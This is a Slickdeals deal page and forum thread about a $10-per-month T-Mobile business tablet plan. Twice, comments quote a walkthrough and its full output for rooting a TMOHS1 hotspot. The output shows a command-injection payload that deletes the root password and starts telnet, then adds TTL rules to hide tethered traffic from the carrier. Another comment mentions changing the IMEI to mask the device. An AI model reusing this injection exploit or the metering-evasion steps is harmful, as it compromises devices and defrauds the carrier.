Slickdeals is community-supported.  We may get paid by brands for deals, including promoted items.
Heads up, this deal has expired. Want to create a deal alert for this item?
expired Posted by King_Chucky • Mar 16, 2022
expired Posted by King_Chucky • Mar 16, 2022

T-Mobile Business Tablet Plan: Unlimited Data + 10GB of Mobile Hotspot

(Valid In-Store only)

$10 per month

$10

T-Mobile
5,700 Comments 1,110,938 Views
Visit T-Mobile
Good Deal
Save
Share
Deal Details
T-Mobile (link is for reference only) is offering a T-Mobile Business Tablet Plan with Unlimited Data + 10GB of Mobile Hotspot for $10 per month. Valid in-store only [store locator].

Thanks to community member King_Chucky for sharing this deal

Note, The Unlimited tablet promo requires a business account with T-Mobile.

Plan Features:
  • Unlimited high-speed on-device 5G/LTE data (5G device required for 5G access), deprioritized after 50GB of usage
  • 10GB of mobile hotspot data, then unlimited mobile hotspot at 3G speeds (600 kbps) for the remainder of the month

Editor's Notes

Written by qwikwit | Staff
  • About this deal:
    • This deal does require verification of your business (example, an EIN number). Check with your local store to see what they require for verification.
    • See forum thread for deal discussion and ideas.

Original Post

Written by King_Chucky
Community Notes
About the Poster
Deal Details
Community Notes
About the Poster
T-Mobile (link is for reference only) is offering a T-Mobile Business Tablet Plan with Unlimited Data + 10GB of Mobile Hotspot for $10 per month. Valid in-store only [store locator].

Thanks to community member King_Chucky for sharing this deal

Note, The Unlimited tablet promo requires a business account with T-Mobile.

Plan Features:
  • Unlimited high-speed on-device 5G/LTE data (5G device required for 5G access), deprioritized after 50GB of usage
  • 10GB of mobile hotspot data, then unlimited mobile hotspot at 3G speeds (600 kbps) for the remainder of the month

Editor's Notes

Written by qwikwit | Staff
  • About this deal:
    • This deal does require verification of your business (example, an EIN number). Check with your local store to see what they require for verification.
    • See forum thread for deal discussion and ideas.

Original Post

Written by King_Chucky

Community Voting

Deal Score
+192
Good Deal
Visit T-Mobile

Leave a Comment

Unregistered (You)

Top Comments

Papote3
134 Posts
54 Reputation
Just an FYI if you're just getting this for the "free" tablet. The tablet is a Galaxy A7 lite which only costs $200 ($129 on Amazon)

They will still lock you to a 2 year EIP even if it's free (They'll make a monthly credit to cover the tablet EIP)

Meaning you'd end up paying $10 for 2 years ($240) for a $129 tablet.

So if you're only doing it for the tablet then it's not worth it
MusicShark
6954 Posts
5506 Reputation
Some people don't live in a house.
needgeech
4732 Posts
2633 Reputation
Not on the "free" tablet, lol. In all seriousness, don't choose the plan with TE in the title as that one is tax exclusive (you have 2 choices)

soc code ZB10HSTI is the one you want.

5,699 Comments

Sign up for a Slickdeals account to remove this ad.

Apr 10, 2022
4,178 Posts
Joined Apr 2009
Apr 10, 2022
emofals
Apr 10, 2022
4,178 Posts
Quote from TealMustang668 :
I have tested this after my hotspot speed throttled to 600kbps. Works like charm.

Windows Instructions
1. Open Powershell (Search Powershell).
2. type
Code:
python
to check installed or not (If its not installed, windows will open app store download it, once the download is completed type python to make sure its installed).
3. Download the zip file from https://github.com/parker-stephen...s/main.zip and unzip it.
4. go to unzipped location in powershell using cd.
5. install the requirements by executing command:
Code:
pip install -r requirements.txt
6. then run the bellow command follow the prompts.

example

Code:
C:\Users\<login>\Downloads\TMOHS1-Root-Utility-main>python ./rootScript.py -v

Verbose mode enabled.

Enter your weblogin password:
Encrypting the login payload with key "abcdefghijklmn12" [yes, that's really the key]. . .
Sending the authentication request. . .
Received authentication token from hotspot: 876876876

Response: {'result': '0', 'ip': '0.0.0.0', 'timeout': '000300', 'token': '9879898'}
Exploiting qcmap_web_cgi. . .


Connection to device may reset. If you are running the exploit via WiFi,
ensure that your device reconnects to the hotspot's network.

Payload is ready: page=savepowersaving&displaytimeout=undefined&wifistandby=10;$(mount -o remount,rw /; telnetd; passwd -d root)&token=987987978
Sending the payload now!
Waiting for socket. . .
If you are running the exploit wirelessly, the connection may drop.
Remember to reconnect to your hotspot's WiFi once it reappears.
This may take up to a minute.

Connected! Socket says: {'commit': 'Socket TimeOut'}

Remounted root filesystem r/w. . .
Removed root password. . .
Enabling telnet. . .
Trying to connect via telnet. . .
Received:

mdm 987987987 mdm9607


mdm9607 login:
Telnet connection initialized.
Logging in as root with empty password, please wait. . .
Waiting for login to be processed. . .

The exploit removed the root password of your device. It is STRONGLY recommended to set a custom root password.
Your device will be EXTREMELY INSECURE if you do not.

Would you like to set a custom root password? (Y/n):
y

Changing root password.
IMPORTANT NOTE: the password will be sent insecurely over telnet,
 so you should manually change it later over ADB-USB if you are concerned about security.

Sent command via telnet: passwd root

Enter new password:
Confirm new password:
Root password successfully updated.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 8
Sent command via telnet: echo "iptables -t mangle -I POSTROUTING -o rmnet_data0 -j TTL --ttl-set 64" > /etc/init.d/ttl.sh; echo "ip6tables -t mangle -I POSTROUTING -o rmnet_data0 -j HL --hl-set 64" >> /etc/init.d/ttl.sh; chmod 755 /etc/init.d/ttl.sh; ln -s /etc/init.d/ttl.sh /etc/rc5.d/S98ttl

Added TTL rules to mask hotspot data as normal "on-device" data. Will take affect on reboot.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 9
Rebooting. Goodbye!
Sent command via telnet: reboot
Note: disable OMA-DM bootstrap by choosing the option 6
Trying the above steps with T9 and I get the below:


PS C:\T9\rooting> python ./rootScript.py -v

Verbose mode enabled.

Enter your weblogin password:
Encrypting the login payload with key "abcdefghijklmn12" [yes, that's really the key]. . .
Sending the authentication request. . .
Traceback (most recent call last):
File "C:\T9\rooting\rootScript.py", line 66, in <module>
if loginData.json()['result'] == '3':
File "C:\Users\Mus\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\requests\models.py", line 910, in json
return complexjson.loads(self.text, **kwargs)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.1264.0_x64__qbz5n2kfra8p0\lib\json\__init__.py", line 346, in loads
return _default_decoder.decode(s)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.1264.0_x64__qbz5n2kfra8p0\lib\json\decoder.py", line 337, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.1264.0_x64__qbz5n2kfra8p0\lib\json\decoder.py", line 355, in raw_decode
raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
Apr 10, 2022
4,178 Posts
Joined Apr 2009
Apr 10, 2022
emofals
Apr 10, 2022
4,178 Posts
Quote from YOU2HOU :
65, my area lte band 66 is fastest. So I lock to it
How do I determine that for my area? And what do I update to lock it?
Apr 10, 2022
18 Posts
Joined Mar 2022
Apr 10, 2022
CalmTent8970
Apr 10, 2022
18 Posts
Quote from emofals :
How do I determine that for my area? And what do I update to lock it?
They are two different devices, you need to search t9. Check the lte band on your phone.
Apr 10, 2022
2,949 Posts
Joined Dec 2007
Apr 10, 2022
xoneinax
Apr 10, 2022
2,949 Posts
Quote from daps :
I'd appreciate some help. I'm currently a retail customer. I have a federal ein for a business and I have a website.

The associate tries again, same result. He said maybe my credit was frozen. I just checked all 3 agencies and no freeze of credit.
You typed in that EIN at all 3 agencies?
Last edited by xoneinax April 10, 2022 at 12:40 AM.
Apr 10, 2022
14 Posts
Joined Mar 2015
Apr 10, 2022
ZoLLo
Apr 10, 2022
14 Posts
Quote from qquser :
You can see the HD add-on on T-Mobile App.
Not able to login on the T-Mobile app only business website. I will keep trying thanks
Apr 10, 2022
4,178 Posts
Joined Apr 2009
Apr 10, 2022
emofals
Apr 10, 2022
4,178 Posts
Quote from CalmTent8970 :
They are two different devices, you need to search t9. Check the lte band on your phone.
The lte band on my iPhone was 2. I searched for T9 and couldn't find any instructions. Do you know if they exist for T9?
Also where do I update the Band and then how do I determine the appropriate TTL value? Just a trial and error based on ping? If I connect to Wi-Fi, do I keep it 1 hop more compares to tethering?Thanks!
Last edited by emofals April 10, 2022 at 09:06 AM.
Apr 10, 2022
100 Posts
Joined Apr 2020
Apr 10, 2022
CalmWinter5777
Apr 10, 2022
100 Posts
Quote from emofals :
Trying the above steps with T9 and I get the below:


PS C:\T9\rooting> python ./rootScript.py -v

Verbose mode enabled.

Enter your weblogin password:
Encrypting the login payload with key "abcdefghijklmn12" [yes, that's really the key]. . .
Sending the authentication request. . .
Traceback (most recent call last):
File "C:\T9\rooting\rootScript.py", line 66, in <module>
if loginData.json()['result'] == '3':
File "C:\Users\Mus\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\requests\models.py", line 910, in json
return complexjson.loads(self.text, **kwargs)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.1264.0_x64__qbz5n2kfra8p0\lib\json\__init__.py", line 346, in loads
return _default_decoder.decode(s)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.1264.0_x64__qbz5n2kfra8p0\lib\json\decoder.py", line 337, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.1264.0_x64__qbz5n2kfra8p0\lib\json\decoder.py", line 355, in raw_decode
raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
Above one is for TMOHS1 devices only

Sign up for a Slickdeals account to remove this ad.

Apr 10, 2022
843 Posts
Joined Nov 2003
Apr 10, 2022
darki
Apr 10, 2022
843 Posts
Quote from darki :
Thank you, must be account related, no messages show in my account online, neither the ones I attempted to send nor the ones I sent to the device.

I will call business support Tomorrow and ask, since I have to ask them to switch me to a TI plan too.
FYI for others having this issue, after about 24 hours, texts are now working on the device without doing anything.
Apr 10, 2022
523 Posts
Joined Apr 2014
Apr 10, 2022
Jimwm
Apr 10, 2022
523 Posts
Quote from CalmWinter5777 :
Above one is for TMOHS1 devices only

A Python code for T9, not the same function but it can be useful for some:

https://github.com/RayBB/franklin-t9-api

Quote :
Use Cases:

Change APN settings based on which sim card is inserted
Change wifi settings based on time of day
See which band priority gets you the best speeds
Enjoy
Last edited by Jimwm April 11, 2022 at 07:20 AM.
Apr 10, 2022
4,250 Posts
Joined Jun 2007
Apr 10, 2022
dvdrdiscs
Apr 10, 2022
4,250 Posts
Quote from TealMustang668 :
I have tested this after my hotspot speed throttled to 600kbps. Works like charm.

Windows Instructions
1. Open Powershell (Search Powershell).
2. type
Code:
python
to check installed or not (If its not installed, windows will open app store download it, once the download is completed type python to make sure its installed).
3. Download the zip file from https://github.com/parker-stephen...s/main.zip and unzip it.
4. go to unzipped location in powershell using cd.
5. install the requirements by executing command:
Code:
pip install -r requirements.txt
6. then run the bellow command follow the prompts.

example

Code:
C:\Users\<login>\Downloads\TMOHS1-Root-Utility-main>python ./rootScript.py -v

Verbose mode enabled.

Enter your weblogin password:
Encrypting the login payload with key "abcdefghijklmn12" [yes, that's really the key]. . .
Sending the authentication request. . .
Received authentication token from hotspot: 876876876

Response: {'result': '0', 'ip': '0.0.0.0', 'timeout': '000300', 'token': '9879898'}
Exploiting qcmap_web_cgi. . .


Connection to device may reset. If you are running the exploit via WiFi,
ensure that your device reconnects to the hotspot's network.

Payload is ready: page=savepowersaving&displaytimeout=undefined&wifistandby=10;$(mount -o remount,rw /; telnetd; passwd -d root)&token=987987978
Sending the payload now!
Waiting for socket. . .
If you are running the exploit wirelessly, the connection may drop.
Remember to reconnect to your hotspot's WiFi once it reappears.
This may take up to a minute.

Connected! Socket says: {'commit': 'Socket TimeOut'}

Remounted root filesystem r/w. . .
Removed root password. . .
Enabling telnet. . .
Trying to connect via telnet. . .
Received:

mdm 987987987 mdm9607


mdm9607 login:
Telnet connection initialized.
Logging in as root with empty password, please wait. . .
Waiting for login to be processed. . .

The exploit removed the root password of your device. It is STRONGLY recommended to set a custom root password.
Your device will be EXTREMELY INSECURE if you do not.

Would you like to set a custom root password? (Y/n):
y

Changing root password.
IMPORTANT NOTE: the password will be sent insecurely over telnet,
 so you should manually change it later over ADB-USB if you are concerned about security.

Sent command via telnet: passwd root

Enter new password:
Confirm new password:
Root password successfully updated.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 8
Sent command via telnet: echo "iptables -t mangle -I POSTROUTING -o rmnet_data0 -j TTL --ttl-set 64" > /etc/init.d/ttl.sh; echo "ip6tables -t mangle -I POSTROUTING -o rmnet_data0 -j HL --hl-set 64" >> /etc/init.d/ttl.sh; chmod 755 /etc/init.d/ttl.sh; ln -s /etc/init.d/ttl.sh /etc/rc5.d/S98ttl

Added TTL rules to mask hotspot data as normal "on-device" data. Will take affect on reboot.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 9
Rebooting. Goodbye!
Sent command via telnet: reboot
Note: disable OMA-DM bootstrap by choosing the option 6

Thanks for this step-by-step guide. Works like a charm. I have both the Franklin T9 and the TMOSH1. The Franklin T9 lets you change the IMEI to further mask the device on the network. Any idea if the TMOSH1 lets you do that?
Apr 10, 2022
4,250 Posts
Joined Jun 2007
Apr 10, 2022
dvdrdiscs
Apr 10, 2022
4,250 Posts
I applied as a sole proprietor and got approved for 12 business lines. Then I got to the screen where it said it wanted me to call in. Anyone did this? What did they ask?
Apr 10, 2022
3,828 Posts
Joined Sep 2004
Apr 10, 2022
GrandMstrBud
Apr 10, 2022
3,828 Posts
Reps at the stores are clueless. Anyway to do this online and add it to my regular account?
Apr 10, 2022
2,949 Posts
Joined Dec 2007
Apr 10, 2022
xoneinax
Apr 10, 2022
2,949 Posts
Quote from GrandMstrBud :
Anyway to do this online and add it to my regular account?
Yes, you can add to your regular business account.
Apr 10, 2022
3,828 Posts
Joined Sep 2004
Apr 10, 2022
GrandMstrBud
Apr 10, 2022
3,828 Posts
Sorry I meant my non business account. Or how can I get a business account setup?

Sign up for a Slickdeals account to remove this ad.

Apr 10, 2022
562 Posts
Joined Oct 2012
Apr 10, 2022
premansh
Apr 10, 2022
562 Posts
Quote from dvdrdiscs :
Thanks for this step-by-step guide. Works like a charm. I have both the Franklin T9 and the TMOSH1. The Franklin T9 lets you change the IMEI to further mask the device on the network. Any idea if the TMOSH1 lets you do that?
Looking for the same on TMOSH1 Smilie

Leave a Comment

Unregistered (You)

Popular Deals

View All

Trending Deals

View All